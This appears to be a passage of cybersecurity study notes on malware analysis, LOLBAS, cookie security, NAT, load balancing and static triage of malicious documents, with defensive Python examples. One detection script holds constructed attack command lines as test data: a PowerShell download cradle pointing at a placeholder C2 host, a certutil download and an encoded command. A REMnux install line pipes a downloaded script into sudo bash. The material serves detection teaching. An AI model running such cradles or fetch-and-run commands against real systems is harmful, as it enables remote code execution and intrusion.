In cybersecurity, an artifact refers to any digital evidence or data that can be collected during an
investigation. Artifacts are used to reconstruct an attack, understand the behavior of malware, or gain
insight into the actions of an adversary.

Types of Artifacts:

- File Artifacts: Malicious files, scripts, or binaries left by attackers (e.g., trojans, ransomware
payloads).
- System Artifacts: Registry changes, log entries, process creation events, or other modifications
to the operating system.
- Network Artifacts: Packet captures, URLs, domains, or IP addresses involved in an attack.

Use in Malware Analysis:

- Artifacts are crucial for reconstructing the kill chain of a cyberattack and for developing detection
signatures (e.g., in IDS/IPS systems).

5. LOLBAS (Living Off The Land Binaries and Scripts)

LOLBAS refers to Living Off the Land Binaries and Scripts. These are legitimate tools, scripts, and
executables that come pre-installed in operating systems but are often abused by attackers for
malicious purposes.

Common LOLBAS Examples:

- PowerShell: Often used by attackers to execute malicious commands or scripts.
- WMIC (Windows Management Instrumentation Command-line): Used to query information or
execute system commands remotely.
- Certutil: Used by attackers to download malicious files while appearing as legitimate
cryptographic operations.

Why It’s Important:

- Since these tools are legitimate, it’s harder for traditional security solutions to detect them as
malicious. Attackers using LOLBAS can evade detection by avoiding custom malware and using
trusted tools in the attack chain.
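
Because the binaries are legitimate, detection has to look at how they are invoked and by what parent, which is what process-creation telemetry (Sysmon event 1, Windows event 4688) provides. As an added example (not from these notes), the Python script below runs a few such rules over constructed events: PowerShell launched with an encoded command or hidden window, download-cradle keywords on any command line, certutil used for URL retrieval or decoding, WMIC creating processes, and an Office application spawning a shell (the fileless and macro cases described earlier). It also decodes an `-EncodedCommand` argument, which is base64 of UTF-16LE text, so the analyst sees the plaintext. The events, paths, hosts and rule names are constructed, and the encoded payload is the harmless `Get-Process`.

```python
import base64
import re

OFFICE_APPS = ("winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe")
SHELLS = ("cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe", "mshta.exe")

# Constructed process-creation events (Sysmon event 1 / Windows 4688 style); not real telemetry.
ENCODED = base64.b64encode("Get-Process".encode("utf-16le")).decode()   # harmless demo payload
EVENTS = [
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": f"powershell.exe -NoProfile -WindowStyle Hidden -EncodedCommand {ENCODED}",
     "user": "CORP\\alice"},
    {"parent": r"C:\Windows\System32\cmd.exe", "image": r"C:\Windows\System32\certutil.exe",
     "cmdline": "certutil.exe -urlcache -f http://files-placeholder.example/a.txt a.txt",
     "user": "CORP\\alice"},
    {"parent": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": "cmd.exe /c powershell -c \"IEX (New-Object Net.WebClient)"
                ".DownloadString('http://c2-placeholder.example/s')\"",
     "user": "CORP\\bob"},
    {"parent": r"C:\Windows\System32\wbem\WmiPrvSE.exe", "image": r"C:\Windows\System32\wbem\WMIC.exe",
     "cmdline": "wmic.exe process call create \"notepad.exe\"", "user": "CORP\\svc-admin"},
    {"parent": r"C:\Windows\System32\services.exe", "image": r"C:\Windows\System32\wbem\WMIC.exe",
     "cmdline": "wmic.exe os get caption", "user": "NT AUTHORITY\\SYSTEM"},
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell.exe -File C:\Scripts\backup.ps1", "user": "CORP\\alice"},
]


def exe_name(path):
    """Base name of an image path, lower-cased, so rules compare 'certutil.exe' not full paths."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def decode_encoded_command(cmdline):
    """-EncodedCommand carries base64(UTF-16LE script); return the plaintext or None."""
    m = re.search(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", cmdline, re.I)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


def evaluate(event):
    """Apply each detection rule to one event; returns the names of the rules that fired."""
    image, parent = exe_name(event["image"]), exe_name(event["parent"])
    cl = event["cmdline"].lower()
    hits = []
    if image in ("powershell.exe", "pwsh.exe"):
        if re.search(r"-(e|ec|enc|encodedcommand)\s", cl):
            hits.append("powershell_encoded_command")
        if re.search(r"-w(indowstyle)?\s+hidden", cl):
            hits.append("powershell_hidden_window")
    if re.search(r"downloadstring|downloadfile|invoke-expression|\biex\b", cl):
        hits.append("powershell_download_cradle")       # the in-memory execution pattern
    if image == "certutil.exe" and re.search(r"-urlcache|-decode|-encode", cl):
        hits.append("certutil_download_or_decode")
    if image == "wmic.exe" and "process call create" in cl:
        hits.append("wmic_process_create")
    if parent in OFFICE_APPS and image in SHELLS:
        hits.append("office_spawns_shell")               # macro-launched shell
    return hits


def scan(events):
    """Return only the events that triggered rules, with the decoded payload when present."""
    results = []
    for index, event in enumerate(events):
        hits = evaluate(event)
        if hits:
            results.append({"index": index, "user": event["user"], "rules": hits,
                            "decoded": decode_encoded_command(event["cmdline"])})
    return results


if __name__ == "__main__":
    for result in scan(EVENTS):
        print(result)
```

The two benign events (WMIC used for an inventory query, PowerShell running a script from a fixed path) fire nothing, which is the balance these rules have to strike: the binary is never the indicator, the combination of parent, arguments and context is.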

6. Why Malware Analysis is Used According to Different Roles

Malware analysis is used by different cybersecurity professionals for various purposes, depending on
their role:

Security Operations Team:

- Goal: Quickly identify and mitigate active malware threats in the network.
- Use Case: Determine the nature of the malware (e.g., ransomware, spyware) to prioritize the
incident response plan.

Threat Hunters:

- Goal: Identify advanced threats that have bypassed existing defenses.
- Use Case: Analyze new or sophisticated malware strains to understand their attack techniques
and improve threat-hunting capabilities.

Forensic Analysts:

- Goal: Investigate and reconstruct an attack for legal or compliance purposes.
- Use Case: Perform in-depth analysis of malware artifacts to understand the full scope of an
attack.

Malware Researchers:

- Goal: Develop new defenses and detection techniques by understanding malware behavior.
- Use Case: Reverse-engineer malware to find vulnerabilities or weak points that defenders can
exploit.

7. Showing Credential Stores in Cookies

Insecure websites may store credentials (such as usernames and passwords) in cookies, which is a
dangerous practice. If an attacker can gain access to a user's cookies (e.g., through cross-site scripting
(XSS)), they can extract sensitive data.

Risks:

- Cookie Theft: Attackers can steal cookies and use them to impersonate users, especially if the
session information is stored in the cookie.
- Improper Use of Session Tokens: If cookies contain unencrypted or non-hashed credentials,
attackers can easily exploit this information.

Mitigation:

- Use HTTP-only and secure flags on cookies.
- Avoid storing sensitive data like credentials in cookies; instead, use session tokens and proper
encryption.
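
As an added example (not from these notes), the Python below audits `Set-Cookie` headers for the two mitigations: it flags cookies whose name suggests a stored credential, and cookies missing the `Secure`, `HttpOnly` or a `SameSite` setting, and it shows the hardened header that carries only an opaque session identifier. The sample headers and the credential name list are constructed for the example.

```python
# Cookie names that suggest a credential rather than an opaque session identifier (assumed list).
CREDENTIAL_NAMES = {"username", "user", "password", "passwd", "pwd", "pass", "secret", "apikey", "api_key"}

# Constructed Set-Cookie headers (not from any real site).
WEAK_HEADERS = [
    "username=alice; Path=/",
    "password=hunter2; Path=/",
    "session=7f3a9c; Path=/; Secure",
]


def parse_set_cookie(header):
    """Split 'name=value; Attr; Attr=val' into the cookie pair and a dict of attributes."""
    parts = [p.strip() for p in header.split(";") if p.strip()]
    name, _, value = parts[0].partition("=")          # only the first '=' separates name and value
    attrs = {}
    for part in parts[1:]:
        key, _, val = part.partition("=")
        attrs[key.strip().lower()] = val.strip()
    return name.strip(), value, attrs


def audit_set_cookie(header):
    """Return the weaknesses found in one Set-Cookie header (empty list if none)."""
    name, _, attrs = parse_set_cookie(header)
    findings = []
    if name.lower() in CREDENTIAL_NAMES:
        findings.append("credential_in_cookie")         # readable by anything that reads the cookie
    if "secure" not in attrs:
        findings.append("missing_Secure")               # would be sent over plain HTTP
    if "httponly" not in attrs:
        findings.append("missing_HttpOnly")             # readable from JavaScript, so XSS can steal it
    if attrs.get("samesite", "").lower() not in ("lax", "strict"):
        findings.append("samesite_none_or_missing")     # sent on cross-site requests (CSRF exposure)
    return findings


def audit_all(headers):
    return {parse_set_cookie(h)[0]: audit_set_cookie(h) for h in headers}


def secure_session_cookie(name, token, max_age=3600):
    """The hardened form: an opaque server-side session id with every protective flag set."""
    return f"{name}={token}; Path=/; Max-Age={max_age}; Secure; HttpOnly; SameSite=Lax"


if __name__ == "__main__":
    for cookie, problems in audit_all(WEAK_HEADERS).items():
        print(cookie, problems)
    print(secure_session_cookie("session", "7f3a9c"), audit_set_cookie(secure_session_cookie("session", "7f3a9c")))
```

`HttpOnly` is the flag that blunts the XSS case described above, since the script injected into the page cannot read the cookie; `Secure` and `SameSite` address interception and cross-site request forgery respectively, and none of them help if the cookie value itself is a password.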

8. NAT (Network Address Translation)

NAT (Network Address Translation) is a process in which a network device, usually a firewall or router,
translates private IP addresses into public IP addresses before the data is transmitted to the internet.

Types of NAT:

- SNAT (Source NAT): Changes the source IP address of outbound traffic. This is used when
multiple devices inside a private network share a single public IP address.
- DNAT (Destination NAT): Changes the destination IP address of incoming traffic. This is often
used to route external traffic to a specific internal device (e.g., port forwarding).
- PAT (Port Address Translation): A type of NAT where multiple devices on a private network are
mapped to a single public IP address but are differentiated by their port numbers. It’s commonly
referred to as NAT overload.

Why NAT is Used:

- Provides privacy by hiding internal IP addresses from the outside world.
- Conserves the number of public IP addresses needed.
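
As an added example (not from these notes), the Python class below models what a small router's NAT table does: outbound packets get SNAT with PAT (the private source is rewritten to the public address and a unique public port, so two internal hosts using the same source port do not collide), replies are translated back by looking up that port, unsolicited inbound packets find no entry and are dropped, and a static DNAT rule forwards one public port to an internal server. Addresses and ports are constructed from documentation ranges.

```python
class NatGateway:
    """Stateful SNAT/PAT plus static DNAT, as a small office router performs it."""

    def __init__(self, public_ip, first_port=40000):
        self.public_ip = public_ip
        self.next_port = first_port
        self.outbound_map = {}   # (src_ip, src_port, dst_ip, dst_port, proto) -> public port
        self.inbound_map = {}    # (public port, dst_ip, dst_port, proto) -> (src_ip, src_port)
        self.dnat = {}           # (public port, proto) -> (internal ip, internal port)

    def add_dnat(self, public_port, internal_ip, internal_port, proto="tcp"):
        """Port forward: anything arriving on public_port goes to one internal host."""
        self.dnat[(public_port, proto)] = (internal_ip, internal_port)

    def outbound(self, src_ip, src_port, dst_ip, dst_port, proto="tcp"):
        """SNAT + PAT: rewrite the source to the public IP and a port unique to this flow.
        Returns the translated (src_ip, src_port, dst_ip, dst_port) as sent to the internet."""
        key = (src_ip, src_port, dst_ip, dst_port, proto)
        if key not in self.outbound_map:                # first packet of the flow: allocate a port
            self.outbound_map[key] = self.next_port
            self.inbound_map[(self.next_port, dst_ip, dst_port, proto)] = (src_ip, src_port)
            self.next_port += 1
        return (self.public_ip, self.outbound_map[key], dst_ip, dst_port)

    def inbound(self, src_ip, src_port, dst_ip, dst_port, proto="tcp"):
        """Reverse translation for packets arriving at the public address.
        Returns the internal (src_ip, src_port, dst_ip, dst_port), or None if dropped."""
        if dst_ip != self.public_ip:
            return None
        if (dst_port, proto) in self.dnat:              # static port forward wins
            return (src_ip, src_port) + self.dnat[(dst_port, proto)]
        internal = self.inbound_map.get((dst_port, src_ip, src_port, proto))
        if internal is None:                            # no flow asked for this: unsolicited, drop
            return None
        return (src_ip, src_port) + internal


if __name__ == "__main__":
    gw = NatGateway("203.0.113.1")
    print(gw.outbound("192.168.1.10", 50000, "198.51.100.7", 443))
    print(gw.outbound("192.168.1.11", 50000, "198.51.100.7", 443))   # same source port, new public port
    print(gw.inbound("198.51.100.7", 443, "203.0.113.1", 40001))
    print(gw.inbound("198.51.100.7", 443, "203.0.113.1", 40999))     # dropped
```

The table is also why NAT is often described as "providing privacy": nothing outside ever sees 192.168.1.10, only the public address and a port that means nothing without the gateway's state.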

9. VPN (Virtual Private Network) Working

A VPN (Virtual Private Network) is a technology that allows users to create a secure and encrypted
connection over the internet. VPNs are often used to connect remote users to private networks or to
protect privacy online.

How VPN Works:

- Encryption: All data transmitted through the VPN is encrypted, making it unreadable to anyone
who intercepts it.
- Tunneling: VPNs create a secure tunnel through which data passes. The tunneling protocols
used include PPTP, L2TP, OpenVPN, and IPsec.
- Masking IP Address: A VPN hides the user’s real IP address and replaces it with one from the
VPN server, improving privacy and circumventing geo-restrictions.

10. IPsec (Internet Protocol Security) Protocol

IPsec is a suite of protocols used to secure internet communications by authenticating and encrypting
each IP packet during transmission.

Key Components of IPsec:

- Authentication Header (AH): Provides data integrity and authentication for the packet but does
not encrypt the data.
- Encapsulating Security Payload (ESP): Provides both encryption and authentication of the
packet, offering more security than AH.
- IKE (Internet Key Exchange): Handles the negotiation of security associations and the
exchange of cryptographic keys to establish a secure connection.

Use Case:

- IPsec is widely used in VPNs to establish secure, encrypted tunnels between remote users and
networks, ensuring confidentiality and integrity of data transmitted over the internet.

---------------------------------------------------------------------------------------------------------------------------------------------------

***************************************************************
---------------------------------------------------------------------------------------------------------------------------------------------------
Load balancer
SQUID
SERVER FARMING
Installing Remnux
Network Mode
NAT
Bridge
Host-Only Based
Static Analysis of Malicious Document
Excel
PDF
DOCX

1. Load Balancer

A load balancer is a device or software application that distributes network traffic across multiple
servers to ensure no single server becomes overwhelmed with too many requests. Load balancers
optimize resource use, improve application reliability, and prevent downtime.

Types of Load Balancers:

- Layer 4 Load Balancer: Operates at the transport layer (Layer 4 of the OSI model). It uses data
like IP addresses and TCP/UDP ports to distribute traffic. Example: HAProxy.
- Layer 7 Load Balancer: Operates at the application layer (Layer 7 of the OSI model). It uses
data like HTTP headers or cookies to make decisions about traffic distribution. Example:
NGINX.

Load Balancer Methods:

- Round-Robin: Distributes traffic equally across all servers.
- Least Connections: Directs traffic to the server with the fewest active connections.
- IP Hashing: Routes traffic based on the IP address of the client, ensuring repeat requests from
the same user are sent to the same server.

Benefits:

- Fault Tolerance: If one server fails, traffic can be routed to another server.
- Scalability: As traffic increases, more servers can be added to the load balancer.
- Improved Performance: Balancing traffic across servers prevents bottlenecks, ensuring faster
response times.
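
As an added example (not from these notes, and not code from HAProxy or NGINX), the Python class below implements the three selection methods and the fault-tolerance behaviour: backends marked down are skipped by every method, round-robin cycles through the healthy pool, least-connections picks the backend with the fewest open connections, and IP hashing uses a deterministic hash (SHA-256 rather than Python's randomized `hash()`) so the same client always lands on the same backend. Backend names and client addresses are constructed.

```python
import hashlib


class LoadBalancer:
    """Round-robin, least-connections and IP-hash selection over a set of backends."""

    def __init__(self, servers):
        self.servers = list(servers)                 # configuration order matters for ties
        self.healthy = set(servers)
        self.active = {s: 0 for s in servers}        # open connections per backend
        self._rr_index = 0

    def _pool(self):
        pool = [s for s in self.servers if s in self.healthy]
        if not pool:
            raise RuntimeError("no healthy backends")
        return pool

    def mark_down(self, server):
        """Health check failed: stop sending traffic there (fault tolerance)."""
        self.healthy.discard(server)

    def mark_up(self, server):
        self.healthy.add(server)

    def round_robin(self):
        """Equal share: each request goes to the next healthy backend in turn."""
        pool = self._pool()
        server = pool[self._rr_index % len(pool)]
        self._rr_index += 1
        return server

    def least_connections(self):
        """Send the request where the fewest connections are currently open."""
        return min(self._pool(), key=lambda s: self.active[s])   # ties: first in config order

    def ip_hash(self, client_ip):
        """Session affinity: the same client address maps to the same backend while the
        pool is unchanged (a backend going down reshuffles the mapping)."""
        pool = self._pool()
        digest = hashlib.sha256(client_ip.encode()).digest()
        return pool[int.from_bytes(digest[:4], "big") % len(pool)]

    def open_connection(self, server):
        self.active[server] += 1

    def close_connection(self, server):
        self.active[server] -= 1


if __name__ == "__main__":
    lb = LoadBalancer(["web1", "web2", "web3"])
    print([lb.round_robin() for _ in range(4)])
    lb.open_connection("web1"); lb.open_connection("web1"); lb.open_connection("web2")
    print(lb.least_connections())
    print(lb.ip_hash("10.0.0.5"), lb.ip_hash("10.0.0.5"))
    lb.mark_down("web2")
    print([lb.round_robin() for _ in range(2)])
```

The IP-hash caveat in the comment is the practical reason production balancers pair affinity with a shared session store: losing one backend changes where roughly a third of clients land.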

2. Squid

Squid is an open-source proxy server and web caching service that optimizes data flow between a
client and server by caching frequently accessed web content. It helps reduce bandwidth usage and
speeds up access to frequently requested data.

Key Features:

- Web Caching: Squid stores copies of frequently requested web pages and files, reducing the
need for repeated downloads from the internet.
- Proxying: Squid acts as an intermediary, forwarding client requests to the appropriate web
server. This improves security by masking the client’s identity.
- Access Control: Squid can enforce access control policies, limiting which clients can access
specific websites or services.

Use Cases:

- Content Filtering: Blocking access to specific websites or web services.
- Improved Network Performance: Caching reduces latency by serving content from local storage
rather than fetching it from remote servers.
- Anonymous Browsing: Users can hide their IP addresses when accessing websites.

3. Server Farming

Server Farming refers to the practice of using a group of servers that work together to handle large
volumes of requests and workloads. A server farm (also known as a data center) is a collection of
interconnected servers housed in one location and managed centrally.

Characteristics:

- Scalability: Server farms can scale horizontally by adding more servers to handle increasing
loads.
- Redundancy: If one server fails, another can take over, providing high availability.
- Load Distribution: Traffic is distributed across multiple servers, often using a load balancer to
manage the requests efficiently.

Use Cases:

- Web Hosting: Large websites and applications rely on server farms to handle thousands or
millions of users simultaneously.
- Cloud Computing: Cloud services like AWS and Google Cloud use server farms to provide
scalable infrastructure for computing, storage, and networking.
- Big Data Processing: Server farms are essential for performing massive data analytics and
computations (e.g., machine learning, AI).

4. Installing Remnux

REMnux is a Linux distribution designed specifically for malware analysis. It comes pre-installed with a
variety of tools for reverse engineering and analyzing malicious software, such as disassemblers,
de-obfuscators, and network traffic analyzers.

Steps for Installing REMnux:

1. Download REMnux: You can either install REMnux as a standalone system or use it as a Virtual
Machine (VM) in environments like VirtualBox or VMware.
2. Virtual Installation:
- Create a new virtual machine in your hypervisor (VirtualBox/VMware).
- Configure settings (allocate CPU, memory, and disk space).
- Install REMnux from an ISO or import the OVA file.
3. Command-Line Installation (If you want to add REMnux tools to an existing Ubuntu installation):
- Run: `wget -q -O - https://remnux.org/get-remnux.sh | sudo bash`
4. Install and update the tools using `remnux upgrade`.

Network Modes (Virtual Machine Networking Options):

- NAT (Network Address Translation): The virtual machine connects to the host’s network and
uses the host’s IP address to access the internet. Good for general use but hides the VM from
the rest of the network.
- Bridged Mode: The VM connects directly to the host's physical network and gets its own IP
address. This allows the VM to act like any other device on the network and be accessible by
other machines on the same network.
- Host-Only Mode: The VM can communicate only with the host machine and other VMs on the
same host. It’s isolated from external networks, making it useful for isolated malware analysis.

5. Static Analysis of Malicious Documents

Static analysis involves examining the structure, content, and metadata of files without executing them.
In the context of malicious documents, static analysis can be applied to files like Excel spreadsheets,
PDFs, and DOCX documents.

Excel (XLS/XLSX) Analysis:

- Embedded Macros: Malicious Excel files often contain VBA (Visual Basic for Applications)
macros that can be used to download malware, open network connections, or modify system
settings.
- Static Analysis Tools: Use `olevba` (part of oletools) to extract and analyze VBA macros, and
`XLMMacroDeobfuscator` for Excel 4.0 (XLM) macro sheets, an older macro format that olevba
reports but does not emulate.
- Indicators of Compromise (IoCs): Look for suspicious URLs, obfuscated code, or commands
that indicate the file is trying to access external resources or execute system commands.

PDF Analysis:

- JavaScript: PDF files can contain embedded JavaScript, which can be exploited to execute
malicious code. Attackers may use this feature to perform drive-by downloads or exploit
vulnerabilities in PDF readers.
- Malicious Objects: PDFs may also contain embedded files, images, or links that redirect users
to malicious websites.
- Static Analysis Tools: Use `pdfid` to count the keywords that signal active content
(`/JavaScript`, `/JS`, `/OpenAction`, `/AA`, `/Launch`, `/EmbeddedFile`) and `pdf-parser` to
walk the object tree and dump the suspicious streams; pdfid also normalises names written with
`#xx` hex escapes, a common trick for hiding `/JavaScript` from naive string searches.

DOCX Analysis:

- Macro-Based Malware: Similar to Excel files, DOCX files may contain malicious macros, often
used to drop malware or open remote connections.
- OLE Objects: Malicious Word documents may contain embedded OLE objects, such as
executables or scripts. These can be extracted and analyzed for potential threats.
- Static Analysis Tools: Use `oletools` to inspect macros, extract metadata, and identify hidden
payloads in Word documents.

6. Network Mode

The network mode defines how a virtual machine interacts with other devices on the network. The three
common modes are:

- NAT (Network Address Translation): The VM uses the host’s IP address to access the external
network but is not directly accessible from other devices on the network.
- Bridged: The VM gets its own IP address on the same network as the host, making it
fully accessible like any other device on the local network.
- Host-Only: The VM can only communicate with the host machine and other VMs,
isolating it from the external network. This is useful for testing environments like malware
sandboxes, where you don’t want the VM to communicate with the internet.
7. Static Analysis of Malicious Documents (More Details)

Static Analysis focuses on examining the structure of files like Excel, PDF, and DOCX without executing
them. A summary by document type:

Excel (XLS/XLSX):

- Macro Analysis: VBA macros embedded in Excel files are a common method for attackers to
deliver malware. Static analysis involves inspecting the macro code for suspicious functions,
such as downloading files from the internet or modifying system settings.
- Tool: `olevba` can extract and analyze VBA macros.

PDF Analysis:

- Embedded Scripts: PDFs often contain embedded JavaScript, which can be malicious. Static
analysis involves inspecting these scripts for potentially harmful functions.
- Tool: `pdf-parser` allows you to extract and inspect objects within a PDF.

DOCX Analysis:

- Embedded Macros: Similar to Excel files, DOCX documents can contain malicious macros that
execute payloads when opened.
- Tool: `oletools` is useful for extracting and analyzing these macros for signs of malicious
behavior.
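The following is an added example, not code from the study material or from the oletools and pdfid projects: a minimal Python triage script that applies the checks both static-analysis sections above describe. It counts pdfid-style keywords in a PDF (after decoding `#xx` name escapes, so `/J#61vaScript` is still found), and lists macro and embedded-object parts inside an OOXML (DOCX/XLSX/PPTX) container, which is just a zip file. All sample documents are constructed in the code and contain no real malware.

```python
import io
import re
import zipfile

# Constructed sample inputs for this example (not real malware).
PDF_WITH_JS = (
    b"%PDF-1.7\n"
    b"1 0 obj << /Type /Catalog /Pages 2 0 R /OpenAction 3 0 R >> endobj\n"
    b"2 0 obj << /Type /Pages /Kids [] /Count 0 >> endobj\n"
    b"3 0 obj << /S /JavaScript /JS (app.alert('constructed sample')) >> endobj\n"
    b"trailer << /Root 1 0 R >>\n%%EOF\n"
)
# Same file with the name /JavaScript written as /J#61vaScript: PDF allows
# #xx hex escapes inside names, which defeats a naive substring search.
PDF_OBFUSCATED = PDF_WITH_JS.replace(b"/JavaScript", b"/J#61vaScript")

# Keywords pdfid reports on; each marks a way for a document to act when opened.
PDF_KEYWORDS = (b"/JavaScript", b"/JS", b"/OpenAction", b"/AA", b"/Launch",
                b"/EmbeddedFile", b"/URI")


def normalize_pdf_names(data: bytes) -> bytes:
    """Decode #xx hex escapes in PDF names so /J#61vaScript becomes /JavaScript."""
    return re.sub(rb"#([0-9A-Fa-f]{2})",
                  lambda m: bytes([int(m.group(1), 16)]), data)


def triage_pdf(data: bytes) -> dict:
    """Count pdfid-style keywords. Returns {keyword: count} for keywords found."""
    data = normalize_pdf_names(data)
    counts = {}
    for kw in PDF_KEYWORDS:
        # the lookahead stops /JS from matching inside a longer name
        n = len(re.findall(re.escape(kw) + rb"(?![A-Za-z])", data))
        if n:
            counts[kw.decode()] = n
    return counts


def build_ooxml(parts: dict) -> bytes:
    """Build an in-memory OOXML (zip) container from {part name: content}."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        for name, content in parts.items():
            z.writestr(name, content)
    return buf.getvalue()


# A .docm-like container carrying a VBA project, and a clean .docx-like one.
DOCM_WITH_MACRO = build_ooxml({
    "[Content_Types].xml": "<Types/>",
    "word/document.xml": "<w:document/>",
    "word/vbaProject.bin": b"\xd0\xcf\x11\xe0" + b"\x00" * 64,  # OLE2 magic + padding
})
DOCX_CLEAN = build_ooxml({
    "[Content_Types].xml": "<Types/>",
    "word/document.xml": "<w:document/>",
})


def triage_ooxml(data: bytes) -> list:
    """List macro and embedded-object parts in a DOCX/XLSX/PPTX container."""
    if not zipfile.is_zipfile(io.BytesIO(data)):
        # Legacy .doc/.xls are OLE2 compound files, not zips: use oletools there.
        return ["not a zip container (legacy OLE2 document? try oleid/olevba)"]
    findings = []
    with zipfile.ZipFile(io.BytesIO(data)) as z:
        for name in z.namelist():
            low = name.lower()
            if low.endswith("vbaproject.bin"):
                findings.append(f"VBA project: {name}")
            elif "/macrosheets/" in low:
                findings.append(f"Excel 4.0 (XLM) macro sheet: {name}")
            elif "/embeddings/" in low:
                findings.append(f"embedded OLE object: {name}")
    return findings
```

A keyword count is a triage signal, not a verdict: a `/JavaScript` hit tells you to pull the object with `pdf-parser` and read the script, and a `vbaProject.bin` part tells you to run `olevba` on the file. The zip listing works because OOXML stores macros and OLE objects as separate parts; legacy binary `.doc`/`.xls` files need the OLE2 parsers in oletools instead.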

---------------------------------------------------------------------------------------------------------------------------------------------------

***************************************************************
---------------------------------------------------------------------------------------------------------------------------------------------------
Defense in Depth
Malware Attack
Malware Types
Malware Family
History of Malware
Defensive Evasion
Safety Precaution

1. Defense in Depth

Defense in Depth is a layered security strategy that employs multiple defensive measures to protect
against a wide range of attacks. Instead of relying on a single security control, Defense in Depth aims
to create redundancies and minimize the risk of any one defense mechanism being breached.

Layers of Defense in Depth:

- Physical Security: Security measures like surveillance cameras, security guards, and access
control systems to protect physical hardware.
- Perimeter Security: Firewalls, intrusion detection/prevention systems (IDS/IPS), and proxy
servers to control access to the network.
- Network Security: Segmentation of internal networks, using Virtual Local Area Networks
(VLANs), implementing VPNs, and secure communication protocols like TLS.
- Endpoint Security: Antivirus, anti-malware, Endpoint Detection and Response (EDR) solutions
to protect individual devices (PCs, servers, mobile devices) from attacks.
- Application Security: Secure coding practices, patch management, web application firewalls
(WAF), and vulnerability scanning of applications.
- Data Security: Encrypting sensitive data at rest and in transit, managing access control to critical
files, and using Data Loss Prevention (DLP) tools.
- Security Awareness: Training employees to recognize phishing attacks, social engineering, and
malware tactics.

Why It’s Important:

- Redundancy: Multiple layers of security ensure that if one defense fails, others can still protect
the system.
- Defense Against a Range of Attacks: By implementing various security measures, organizations
are better protected from a wide array of threats like malware, insider attacks, and APTs
(Advanced Persistent Threats).
- Mitigating Risk: Defense in Depth reduces the overall risk of a security breach, even in highly
complex and interconnected environments.

2. Malware Attack

A malware attack occurs when malicious software infiltrates a system or network, compromising its
integrity, confidentiality, and availability. Malware attacks can be used for stealing sensitive information,
causing damage to systems, or taking control of networks for further malicious activity.

Stages of a Malware Attack:

- Infection/Delivery: The malware is delivered to the target system. Common delivery methods
include phishing emails, malicious attachments, drive-by downloads, and USB devices.
- Execution: Once delivered, the malware is executed. This could happen automatically when the
file is opened or through user action, like enabling macros in a document.
- Propagation: Some malware, such as worms, can spread from the initially infected system to
other devices on the network.
- Payload Activation: The main function of the malware is executed. This could involve stealing
data, encrypting files (ransomware), or providing remote access to an attacker (remote access
trojan, or RAT).
- Persistence: Malware often tries to maintain long-term access to a system by creating
backdoors or modifying system configurations to ensure it survives reboots or user attempts to
remove it.

3. Malware Types

There are various types of malware, each with a unique purpose and attack method. Here are some of
the common types:

1. Virus:
a. A type of malware that attaches itself to legitimate programs or files and spreads when these
programs are executed. Viruses can corrupt files, steal data, or disable system functions.
2. Worm:
a. Unlike a virus, worms can self-replicate and spread across networks without the need to attach
to a host file. Worms are often responsible for widespread network infections.
3. Trojan Horse (Trojan):
a. A Trojan disguises itself as a legitimate file or software but secretly carries out malicious actions.
It often serves as a backdoor for attackers to gain control of the system.
4. Ransomware:
a. Ransomware encrypts files on the victim’s system and demands a ransom payment (usually in
cryptocurrency) for the decryption key.
5. Spyware:
a. Spyware secretly monitors user activity, collects sensitive information (e.g., passwords, credit
card numbers), and sends it back to the attacker without the user's knowledge.
6. Adware:
a. Adware automatically displays or downloads advertisements, often redirecting users to
malicious sites or tracking their online behavior.
7. Rootkit:
a. Rootkits allow attackers to gain elevated privileges on a compromised system and hide their
presence. They can modify system files or processes to evade detection.
8. Keylogger:
a. Keyloggers capture and log keystrokes made by the user, often to steal sensitive data such as
usernames, passwords, and credit card details.
9. Botnet:
a. A group of compromised systems controlled by an attacker (the botmaster) is called a botnet.
These systems are used to carry out large-scale attacks like Distributed Denial of Service
(DDoS).

4. Malware Family

A malware family refers to a group of malware variants that share common characteristics or codebase.
Malware families are often named based on the malware’s creator or the functionality of the malware.
Security researchers identify and categorize malware based on behavioral patterns, signatures, or code
similarities.

Examples:

- Emotet: Began as a banking Trojan and evolved into a modular loader botnet; it spreads through
phishing emails and sells access by downloading additional payloads such as ransomware.
- Zeus: A family of Trojan malware primarily designed to steal banking credentials by intercepting
form inputs from web browsers.
- Locky: A ransomware family that spreads through email attachments and encrypts users’ files.

5. History of Malware

The history of malware dates back several decades, and the evolution of malware has progressed in
parallel with the development of computer systems and the internet.

Key Milestones in Malware History:

- 1971 - Creeper: The first known self-replicating program, Creeper moved between ARPANET
machines as an experiment in self-replication; the program written to remove it, Reaper, is
often called the first antivirus.
- 1986 - Brain Virus: One of the first viruses to target the MS-DOS operating system, Brain was a
boot-sector virus.
- 1999 - Melissa Virus: A macro virus that spread via Microsoft Word email attachments, causing
significant disruption to corporate email systems.
- 2000 - ILOVEYOU Worm: One of the most damaging worms, ILOVEYOU spread via email and
caused billions of dollars in damage by overwriting files and sending itself to all contacts in the
victim's address book.
- 2007 - Zeus Trojan: A highly sophisticated banking Trojan that became widespread, stealing
online banking credentials from millions of infected systems.
- 2017 - WannaCry Ransomware: A devastating ransomware worm that exploited a vulnerability
in the Windows SMBv1 protocol (MS17-010, via the leaked EternalBlue exploit), spreading rapidly
across the globe and affecting critical systems like hospitals and telecommunications. A patch
had been available for two months, which made it the standard example of why patch management
matters.

6. Defensive Evasion

Defensive evasion refers to the techniques used by malware and attackers to avoid detection by
security tools like antivirus, firewalls, intrusion detection/prevention systems (IDS/IPS), and endpoint
detection and response (EDR) solutions.

Common Defensive Evasion Techniques:

- Obfuscation: Malicious code is obscured or obfuscated to avoid detection by security tools. This
can involve encoding, encryption, or packing the malware.
- Code Signing Abuse: Attackers may use stolen or forged digital certificates to sign their
malicious software, making it appear legitimate to security software.
- Anti-Sandboxing: Malware checks if it is being executed in a virtualized or sandboxed
